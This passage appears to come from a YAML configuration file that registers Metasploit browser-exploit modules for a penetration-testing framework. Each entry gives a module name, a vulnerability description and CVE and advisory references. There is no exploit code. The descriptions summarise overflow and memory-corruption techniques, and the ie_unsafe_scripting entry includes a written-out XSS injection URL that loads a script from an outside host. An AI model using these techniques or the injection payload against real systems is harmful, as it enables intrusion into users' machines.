\t\t\t\tan IDISPATCH the algorithm will try to do a VariantClear of the destination before\n\
\t\t\t\tusing it. This will end up on a call to PlainRelease which deref the reference\n\
\t\t\t\tand clean the object.\"\n\n\
\t\t\t\tNOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.\n\
\t\t\t"
authors:
- - CVE
- 2010-0806
- - OSVDB
- "62810"
- - BID
- "38615"
- - URL
- http://www.microsoft.com/technet/security/advisory/981374.mspx
- - URL
- http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/
- - URL
- http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html
- - MSB
- MS10-018
path: extensions/metasploit/
class: Msf_module
msf_nis2004_get:
enable: true
msf: true
msf_key: windows/browser/nis2004_get
name: Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX\n\
\t\t\t\tControl (ISLAert.dll) provided by Symantec Norton Internet Security 2004.\n\
\t\t\t\tBy sending a overly long string to the \"Get()\" method, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1689
- - OSVDB
- "36164"
- - URL
- http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html
path: extensions/metasploit/
class: Msf_module
msf_ibmlotusdomino_dwa_uploadmodule:
enable: true
msf: true
msf_key: windows/browser/ibmlotusdomino_dwa_uploadmodule
name: IBM Lotus Domino Web Access Upload Module Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module.\n\
\t\t\t\tBy sending an overly long string to the \"General_ServerName()\" property located\n\
\t\t\t\tin the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4474
- - OSVDB
- "40954"
- - BID
- "26972"
- - URL
- http://milw0rm.com/exploits/4820
path: extensions/metasploit/
class: Msf_module
msf_hp_loadrunner_addfolder:
enable: true
msf: true
msf_key: windows/browser/hp_loadrunner_addfolder
name: HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Persits Software Inc's\n\
\t\t\t\tXUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0.\n\
\t\t\t\tBy passing an overly long string to the AddFolder method, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-6530
- - OSVDB
- "39901"
- - BID
- "27025"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html
path: extensions/metasploit/
class: Msf_module
msf_ea_checkrequirements:
enable: true
msf: true
msf_key: windows/browser/ea_checkrequirements
name: Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl\n\
\t\t\t\tActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long\n\
\t\t\t\tstring to the CheckRequirements() method, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4466
- - OSVDB
- "37723"
path: extensions/metasploit/
class: Msf_module
msf_ms06_057_webview_setslice:
enable: true
msf: true
msf_key: windows/browser/ms06_057_webview_setslice
name: Internet Explorer WebViewFolderIcon setSlice() Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a flaw in the WebViewFolderIcon ActiveX control\n\
\t\t\tincluded with Windows 2000, Windows XP, and Windows 2003. This flaw was published\n\
\t\t\tduring the Month of Browser Bugs project (MoBB #18).\n\
\t\t\t"
authors:
- - CVE
- 2006-3730
- - OSVDB
- "27110"
- - MSB
- MS06-057
- - BID
- "19030"
- - URL
- http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html
path: extensions/metasploit/
class: Msf_module
msf_sonicwall_addrouteentry:
enable: true
msf: true
msf_key: windows/browser/sonicwall_addrouteentry
name: SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n\
\t\t\t\tBy sending an overly long string to the \"AddRouteEntry()\" method located\n\
\t\t\t\tin the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5603
- - OSVDB
- "39069"
- - URL
- http://www.sec-consult.com/303.html
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_extsetowner:
enable: true
msf: true
msf_key: windows/browser/trendmicro_extsetowner
name: Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a remote code execution vulnerability in Trend Micro\n\
\t\t\t\tInternet Security Pro 2010 ActiveX.\n\
\t\t\t\tWhen sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-3189
- - OSVDB
- "67561"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-165/
- - URL
- http://www.exploit-db.com/exploits/14878/
path: extensions/metasploit/
class: Msf_module
msf_mcafee_mcsubmgr_vsprintf:
enable: true
msf: true
msf_key: windows/browser/mcafee_mcsubmgr_vsprintf
name: McAfee Subscription Manager Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n\
\t\t\t\tDue to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n\
\t\t\t\tpassing a large string to one of the COM-exposed routines, such as IsAppExpired.\n\
\t\t\t\tThis vulnerability was discovered by Karl Lynn of eEye.\n\
\t\t\t"
authors:
- - CVE
- 2006-3961
- - OSVDB
- "27698"
- - BID
- "19265"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html
path: extensions/metasploit/
class: Msf_module
msf_ms09_043_owc_htmlurl:
enable: true
msf: true
msf_key: windows/browser/ms09_043_owc_htmlurl
name: Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Microsoft's Office Web Components.\n\
\t\t\t\tWhen passing an overly long string as the \"HTMLURL\" parameter an attacker can\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-1534
- - OSVDB
- "56916"
- - BID
- "35992"
- - MSB
- MS09-043
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819
path: extensions/metasploit/
class: Msf_module
msf_communicrypt_mail_activex:
enable: true
msf: true
msf_key: windows/browser/communicrypt_mail_activex
name: CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll\n\
\t\t\t\tActiveX Control provided by CommuniCrypt Mail 1.16. By sending a overly\n\
\t\t\t\tlong string to the \"AddAttachments()\" method, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "64839"
- - URL
- http://www.exploit-db.com/exploits/12663
path: extensions/metasploit/
class: Msf_module
msf_gom_openurl:
enable: true
msf: true
msf_key: windows/browser/gom_openurl
name: GOM Player ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in GOM Player 2.1.6.3499.\n\
\t\t\t\tBy sending an overly long string to the \"OpenUrl()\" method located\n\
\t\t\t\tin the GomWeb3.dll Control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5779
- - OSVDB
- "38282"
- - URL
- http://secunia.com/advisories/27418/
path: extensions/metasploit/
class: Msf_module
msf_facebook_extractiptc:
enable: true
msf: true
msf_key: windows/browser/facebook_extractiptc
name: Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Facebook Photo Uploader 4.\n\
\t\t\t\tBy sending an overly long string to the \"ExtractIptc()\" property located\n\
\t\t\t\tin the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-5711
- - OSVDB
- "41073"
- - BID
- "27534"
- - URL
- http://milw0rm.com/exploits/5049
path: extensions/metasploit/
class: Msf_module
msf_ask_shortformat:
enable: true
msf: true
msf_key: windows/browser/ask_shortformat
name: Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.\n\
\t\t\t\tAn attacker may be able to excute arbitrary code by sending an overly\n\
\t\t\t\tlong string to the \"ShortFormat()\" method in askbar.dll.\n\
\t\t\t"
authors:
- - CVE
- 2007-5107
- - OSVDB
- "37735"
- - URL
- http://wslabi.com/wabisabilabi/showBidInfo.do?code=ZD-00000148
path: extensions/metasploit/
class: Msf_module
msf_ibmegath_getxmlvalue:
enable: true
msf: true
msf_key: windows/browser/ibmegath_getxmlvalue
name: IBM Access Support ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in IBM Access Support. When\n\
\t\t\t\tsending an overly long string to the GetXMLValue() method of IbmEgath.dll\n\
\t\t\t\t(3.20.284.0) an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0215
- - OSVDB
- "52958"
- - BID
- "34228"
path: extensions/metasploit/
class: Msf_module
msf_apple_quicktime_smil_debug:
enable: true
msf: true
msf_key: windows/browser/apple_quicktime_smil_debug
name: Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Apple QuickTime\n\
\t\t\t\t7.6.6. When processing a malformed SMIL uri, a stack-based buffer\n\
\t\t\t\toverflow can occur when logging an error message.\n\
\t\t\t"
authors:
- - CVE
- 2010-1799
- - OSVDB
- "66636"
- - BID
- "41962"
- - URL
- http://secunia.com/advisories/40729/
- - URL
- http://support.apple.com/kb/HT4290
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_executerequest_dbg:
enable: true
msf: true
msf_key: windows/browser/novelliprint_executerequest_dbg
name: Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.\n\
\t\t\t\tWhen sending an overly long string to the 'debug' parameter in ExecuteRequest()\n\
\t\t\t\tproperty of ienipp.ocx an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-3106
- - OSVDB
- "66960"
- - URL
- http://dvlabs.tippingpoint.com/advisory/TPTI-10-06
- - URL
- http://www.exploit-db.com/exploits/15001/
path: extensions/metasploit/
class: Msf_module
msf_enjoysapgui_comp_download:
enable: true
msf: true
msf_key: windows/browser/enjoysapgui_comp_download
name: EnjoySAP SAP GUI ActiveX Control Arbitrary File Download
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\n\
\t\t\t\tby abusing the \"Comp_Download\" method in the SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41).\n\
\t\t\t"
authors:
- - CVE
- 2008-4830
- - OSVDB
- "53680"
- - URL
- http://dsecrg.com/files/pub/pdf/HITB%20-%20Attacking%20SAP%20Users%20with%20Sapsploit.pdf
path: extensions/metasploit/
class: Msf_module
msf_ms08_078_xml_corruption:
enable: true
msf: true
msf_key: windows/browser/ms08_078_xml_corruption
name: Internet Explorer Data Binding Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a vulnerability in the data binding feature of Internet\n\
\t\t\tExplorer. In order to execute code reliably, this module uses the .NET DLL\n\
\t\t\tmemory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n\
\t\t\tused to create a fake vtable at a known location with all methods pointing\n\
\t\t\tto our payload. Since the .text segment of the .NET DLL is non-writable, a\n\
\t\t\tprefixed code stub is used to copy the payload into a new memory segment and\n\
\t\t\tcontinue execution from there.\n\
\t\t\t"
authors:
- - CVE
- 2008-4844
- - OSVDB
- "50622"
- - BID
- "32721"
- - MSB
- MS08-078
- - URL
- http://www.microsoft.com/technet/security/advisory/961051.mspx
- - URL
- http://taossa.com/archive/bh08sotirovdowd.pdf
path: extensions/metasploit/
class: Msf_module
msf_ms10_018_ie_tabular_activex:
enable: true
msf: true
msf_key: windows/browser/ms10_018_ie_tabular_activex
name: Internet Explorer Tabular Data Control ActiveX Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption vulnerability in the Internet Explorer\n\
\t\t\t\tTabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet\n\
\t\t\t\tExplorer are vulnerable.\n\n\
\t\t\t\tBy specifying a long value as the \"DataURL\" parameter to this control, it is possible\n\
\t\t\t\tto write a NUL byte outside the bounds of an array. By targeting control flow data\n\
\t\t\t\ton the stack, an attacker can execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-0805
- - OSVDB
- "63329"
- - BID
- "39025"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-034
- - MSB
- MS10-018
path: extensions/metasploit/
class: Msf_module
msf_adobe_flashplayer_newfunction:
enable: true
msf: true
msf_key: windows/fileformat/adobe_flashplayer_newfunction
name: Adobe Flash Player "newfunction" Invalid Pointer Use
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the DoABC tag handling within\n\
\t\t\t\tversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n\
\t\t\t\tvulnerable, as are any other applications that may embed Flash player.\n\n\
\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\n\
\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\n\
\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\n\n\
\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\n\
\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\n\
\t\t\t\tWindows versions due a the hardcoded syscall number.\n\
\t\t\t"
authors:
- - CVE
- 2010-1297
- - OSVDB
- "65141"
- - BID
- "40586"
- - URL
- http://www.adobe.com/support/security/advisories/apsa10-01.html
- - URL
- http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/
path: extensions/metasploit/
class: Msf_module
msf_verypdf_pdfview:
enable: true
msf: true
msf_key: windows/browser/verypdf_pdfview
name: VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow\n\
\t\t\t\tbecause it fails to properly bounds-check user-supplied data before copying\n\
\t\t\t\tit into an insufficiently sized memory buffer. An attacker can exploit this issue\n\
\t\t\t\tto execute arbitrary code within the context of the affected application.\n\
\t\t\t"
authors:
- - CVE
- 2008-5492
- - OSVDB
- "49871"
- - BID
- "32313"
path: extensions/metasploit/
class: Msf_module
msf_symantec_appstream_unsafe:
enable: true
msf: true
msf_key: windows/browser/symantec_appstream_unsafe
name: Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability\n\
\t\t\t\tis in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the \"installAppMgr()\"\n\
\t\t\t\tmethod. The insecure method can be exploited to download and execute arbitrary files in the\n\
\t\t\t\tcontext of the currently logged-on user.\n\
\t\t\t"
authors:
- - CVE
- 2008-4388
- - OSVDB
- "51410"
path: extensions/metasploit/
class: Msf_module
msf_realplayer_import:
enable: true
msf: true
msf_key: windows/browser/realplayer_import
name: RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and\n\
\t\t\t\tRealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the \"Import()\"\n\
\t\t\t\tmethod, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5601
- - OSVDB
- "41430"
- - BID
- "26130"
path: extensions/metasploit/
class: Msf_module
msf_ms03_020_ie_objecttype:
enable: true
msf: true
msf_key: windows/browser/ms03_020_ie_objecttype
name: MS03-020 Internet Explorer Object Type
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Internet Explorer's\n\
\t\t\t\thandling of the OBJECT type attribute.\n\
\t\t\t"
authors:
- - CVE
- 2003-0344
- - OSVDB
- "2967"
- - BID
- "7806"
- - MSB
- MS03-020
path: extensions/metasploit/
class: Msf_module
msf_ms10_042_helpctr_xss_cmd_exec:
enable: true
msf: true
msf_key: windows/browser/ms10_042_helpctr_xss_cmd_exec
name: Microsoft Help Center XSS and Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tHelp and Support Center is the default application provided to access online\n\
\t\t\t\tdocumentation for Microsoft Windows. Microsoft supports accessing help documents\n\
\t\t\t\tdirectly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\n\
\t\t\t\tan error in validation of input to hcp:// combined with a local cross site\n\
\t\t\t\tscripting vulnerability and a specialized mechanism to launch the XSS trigger,\n\
\t\t\t\tarbitrary command execution can be achieved.\n\n\
\t\t\t\tOn IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n\
\t\t\t\tcan be used to launch the exploit automatically. If IE8 and WMP11, either can\n\
\t\t\t\tbe used to launch the attack, but both pop dialog boxes asking the user if\n\
\t\t\t\texecution should continue. This exploit detects if non-intrusive mechanisms are\n\
\t\t\t\tavailable and will use one if possible. In the case of both IE8 and WMP11, the\n\
\t\t\t\texploit defaults to using an iframe on IE8, but is configurable by setting the\n\
\t\t\t\tDIALOGMECH option to \"none\" or \"player\".\n\
\t\t\t"
authors:
- - CVE
- 2010-1885
- - OSVDB
- "65264"
- - URL
- http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY
- - URL
- http://www.microsoft.com/technet/security/advisory/2219475.mspx
- - MSB
- MS10-042
path: extensions/metasploit/
class: Msf_module
msf_ultraoffice_httpupload:
enable: true
msf: true
msf_key: windows/browser/ultraoffice_httpupload
name: Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Ultra Shareware's Office\n\
\t\t\t\tControl. When processing the 'HttpUpload' method, the arguments are concatenated\n\
\t\t\t\ttogether to form a command line to run a bundled version of cURL. If the command\n\
\t\t\t\tfails to run, a stack-based buffer overflow occurs when building the error\n\
\t\t\t\tmessage. This is due to the use of sprintf() without proper bounds checking.\n\n\
\t\t\t\tNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n\
\t\t\t\tinto memory unmodified.\n\
\t\t\t"
authors:
- - CVE
- 2008-3878
- - OSVDB
- "47866"
- - BID
- "30861"
- - URL
- http://www.exploit-db.com/exploits/6318
path: extensions/metasploit/
class: Msf_module
msf_awingsoft_winds3d_sceneurl:
enable: true
msf: true
msf_key: windows/browser/awingsoft_winds3d_sceneurl
name: AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an untrusted program execution vulnerability within the\n\
\t\t\t\tWinds3D Player from AwingSoft. The Winds3D Player is a browser plugin for\n\
\t\t\t\tIE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'\n\
\t\t\t\tparameter to the URL to an executable, an attacker can execute arbitrary\n\
\t\t\t\tcode.\n\n\
\t\t\t\tTesting was conducted using plugin version 3.5.0.9 for Firefox 3.5 and\n\
\t\t\t\tIE 8 on Windows XP SP3.\n\
\t\t\t"
authors:
- - CVE
- 2009-4850
- - OSVDB
- "60049"
path: extensions/metasploit/
class: Msf_module
msf_hyleos_chemviewx_activex:
enable: true
msf: true
msf_key: windows/browser/hyleos_chemviewx_activex
name: Hyleos ChemView ActiveX Control Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos\n\
\t\t\t\tChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods\n\
\t\t\t\twith an overly long first argument, an attacker can overrun a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-0679
- - OSVDB
- "62276"
- - URL
- http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf
- - URL
- http://www.exploit-db.com/exploits/11422/
path: extensions/metasploit/
class: Msf_module
msf_wmi_admintools:
enable: true
msf: true
msf_key: windows/browser/wmi_admintools
name: Microsoft WMI Administration Tools ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory trust issue in the Microsoft WMI\n\
\t\t\t\tAdministration tools ActiveX control. When processing a specially crafted\n\
\t\t\t\tHTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat\n\
\t\t\t\tthe 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods\n\
\t\t\t\tas a trusted pointer. It makes an indirect call via this pointer which leads\n\
\t\t\t\tto arbitrary code execution.\n\n\
\t\t\t\tThis exploit utilizes a combination of heap spraying and the\n\
\t\t\t\t.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n\
\t\t\t\topt-in to ASLR. As such, this module should be reliable on all Windows\n\
\t\t\t\tversions.\n\n\
\t\t\t\tThe WMI Adminsitrative Tools are a standalone download & install (linked in the\n\
\t\t\t\treferences).\n\n\
\t\t\t"
authors:
- - OSVDB
- "69942"
- - CVE
- 2010-3973
- - BID
- "45546"
- - URL
- http://wooyun.org/bug.php?action=view&id=1006
- - URL
- http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf
- - URL
- http://secunia.com/advisories/42693
- - URL
- http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314
path: extensions/metasploit/
class: Msf_module
msf_realplayer_console:
enable: true
msf: true
msf_key: windows/browser/realplayer_console
name: RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.\n\
\t\t\t\tBy sending a specially crafted string to the 'Console' property\n\
\t\t\t\tin the rmoc3260.dll control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-1309
- - OSVDB
- "42946"
- - BID
- "28157"
- - URL
- http://secunia.com/advisories/29315/
path: extensions/metasploit/
class: Msf_module
msf_mozilla_nstreerange:
enable: true
msf: true
msf_key: windows/browser/mozilla_nstreerange
name: Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a code execution vulnerability in Mozilla Firefox\n\
\t\t\t\t3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n\
\t\t\t\tBy overwriting a subfunction of invalidateSelection it is possible to free the \n\
\t\t\t\tnsTreeRange object that the function currently operates on. \n\
\t\t\t\tAny further operations on the freed object can result in remote code execution.\n\
\t\t\t\tUtilizing the call setup the function provides it's possible to bypass DEP\n\
\t\t\t\twithout the need for a ROP. Sadly this exploit is still either dependent\n\
\t\t\t\ton Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n\
\t\t\t\tmodules anymore.\n\
\t\t\t"
authors:
- - CVE
- 2011-0073
- - OSVDB
- "72087"
- - BID
- "47663"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-157/
- - URL
- https://bugzilla.mozilla.org/show_bug.cgi?id=630919
- - URL
- http://www.mozilla.org/security/announce/2011/mfsa2011-13.html
path: extensions/metasploit/
class: Msf_module
msf_ms09_072_style_object:
enable: true
msf: true
msf_key: windows/browser/ms09_072_style_object
name: Internet Explorer Style getElementsByTagName Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a vulnerability in the getElementsByTagName function\n\
\t\t\tas implemented within Internet Explorer.\n\
\t\t\t"
authors:
- - MSB
- MS09-072
- - CVE
- 2009-3672
- - OSVDB
- "50622"
- - BID
- "37085"
- - URL
- http://www.microsoft.com/technet/security/advisory/977981.mspx
- - URL
- http://taossa.com/archive/bh08sotirovdowd.pdf
path: extensions/metasploit/
class: Msf_module
msf_ms08_053_mediaencoder:
enable: true
msf: true
msf_key: windows/browser/ms08_053_mediaencoder
name: Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Windows Media Encoder 9. When\n\
\t\t\t\tsending an overly long string to the GetDetailsString() method of wmex.dll\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-3008
- - OSVDB
- "47962"
- - BID
- "31065"
- - MSB
- MS08-053
path: extensions/metasploit/
class: Msf_module
msf_greendam_url:
enable: true
msf: true
msf_key: windows/browser/greendam_url
name: Green Dam URL Processing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Green Dam Youth Escort\n\
\t\t\t\tversion 3.17 in the way it handles overly long URLs.\n\
\t\t\t\tBy setting an overly long URL, an attacker can overrun a buffer and execute\n\
\t\t\t\tarbitrary code. This module uses the .NET DLL memory technique by Alexander\n\
\t\t\t\tSotirov and Mark Dowd and should bypass DEP, NX and ASLR.\n\
\t\t\t"
authors:
- - OSVDB
- "55126"
- - URL
- http://www.cse.umich.edu/~jhalderm/pub/gd/
- - URL
- http://www.milw0rm.com/exploits/8938
- - URL
- http://taossa.com/archive/bh08sotirovdowd.pdf
path: extensions/metasploit/
class: Msf_module
msf_ie_unsafe_scripting:
enable: true
msf: true
msf_key: windows/browser/ie_unsafe_scripting
name: Internet Explorer Unsafe Scripting Misconfiguration
category: Metasploit
description: "\n\
\t\t\t\tThis exploit takes advantage of the \"Initialize and script ActiveX controls not\n\
\t\t\tmarked safe for scripting\" setting within Internet Explorer. When this option is set,\n\
\t\t\tIE allows access to the WScript.Shell ActiveX control, which allows javascript to\n\
\t\t\tinteract with the file system and run commands. This security flaw is not uncommon\n\
\t\t\tin corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to\n\
\t\t\tsave binary data to the file system, ADODB.Stream access is required, which in IE7\n\
\t\t\twill trigger a cross domain access violation. As such, we write the code to a .vbs\n\
\t\t\tfile and execute it from there, where no such restrictions exist.\n\n\
\t\t\t\tWhen set via domain policy, the most common registry entry to modify is HKLM\\\n\
\t\t\tSoftware\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1201,\n\
\t\t\twhich if set to '0' forces ActiveX controls not marked safe for scripting to be\n\
\t\t\tenabled for the Intranet zone.\n\n\
\t\t\t\tThis module creates a javascript/html hybrid that will render correctly either\n\
\t\t\tvia a direct GET http://msf-server/ or as a javascript include, such as in:\n\
\t\t\thttp://intranet-server/xss.asp?id=\"><script%20src=http://10.10.10.10/ie_unsafe_script.js>\n\
\t\t\t</script>.\n\
\t\t\t"
authors:
- - URL
- http://support.microsoft.com/kb/182569
- - URL
- http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html
path: extensions/metasploit/
class: Msf_module
msf_ms09_043_owc_msdso:
enable: true
msf: true
msf_key: windows/browser/ms09_043_owc_msdso
name: Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a memory corruption vulnerability within versions 10 and 11 of\n\
\t\t\t\tthe Office Web Component Spreadsheet ActiveX control. This module was based on\n\
\t\t\t\tan exploit found in the wild.\n\
\t\t\t"
authors:
- - CVE
- 2009-1136
- - OSVDB
- "55806"
- - MSB
- MS09-043
- - URL
- http://ahmed.obied.net/software/code/exploits/ie_owc.py
- - URL
- http://www.exploit-db.com/exploits/9163/
- - URL
- http://www.microsoft.com/technet/security/advisory/973472.mspx
path: extensions/metasploit/
class: Msf_module
msf_ms11_003_ie_css_import:
enable: true
msf: true
msf_key: windows/browser/ms11_003_ie_css_import
name: Internet Explorer CSS Recursive Import Use After Free
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption vulnerability within Microsoft\\'s\n\
\t\t\t\tHTML engine (mshtml). When parsing an HTML page containing a recursive CSS\n\
\t\t\t\timport, a C++ object is deleted and later reused. This leads to arbitrary\n\
\t\t\t\tcode execution.\n\n\
\t\t\t\tThis exploit utilizes a combination of heap spraying and the\n\
\t\t\t\t.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n\
\t\t\t\topt-in to ASLR. As such, this module should be reliable on all Windows\n\
\t\t\t\tversions with .NET 2.0.50727 installed.\n\
\t\t\t"
authors:
- - CVE
- 2010-3971
- - OSVDB
- "69796"
- - BID
- "45246"
- - URL
- http://www.microsoft.com/technet/security/advisory/2488013.mspx
- - URL
- http://www.wooyun.org/bugs/wooyun-2010-0885
- - URL
- http://seclists.org/fulldisclosure/2010/Dec/110
- - URL
